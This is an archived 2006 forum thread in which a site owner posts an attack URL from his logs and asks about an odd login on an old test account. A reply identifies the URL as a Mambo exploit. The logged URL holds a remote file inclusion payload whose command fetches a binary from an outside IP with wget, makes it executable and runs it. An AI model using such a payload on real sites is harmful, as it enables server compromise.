draxion Posted March 6, 2006 Posted March 6, 2006 Hi, I'm wondering if anyone can help me out. I noticed the following in my web stats today and assumed it was just another attempted to try and hack my site. Here's the url that was recorded: http://66.49.232.190/index.php?option=com_...x2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://204.83.56.144/cmd.gif?&cmd=cd%20/tmp;wget%20204.83.56.144/gicupo;chmod%20744%20gicupo;./gicup I've gotten a few of these in the past and have simply denied access to the IPs. They never seem to appear again. But this time, about an hour later, I noticed someone logged on using an old test account that I created a few months back. They logged on for about 8 minutes and then loged off using my logoff.php page. Strange. The originating IP address is not the same but both IP addresses are from the same ISP; MCI. I'm wondering what happened. Did someone get a hold of my accounts and passwords? How did this happen? Anyone have any ideas? Thanks Shayne
kgt Posted March 6, 2006 Posted March 6, 2006 This URL looks like a Mambo URL, and lo and behold: http://forum.mamboserver.com/showthread.php?t=73285 Unless you're running Mambo, this isn't an issue. It looks like someone might be indiscriminantly hitting PHP sites. Contributions Discount Coupon Codes Donations
Recommended Posts
Archived
This topic is now archived and is closed to further replies.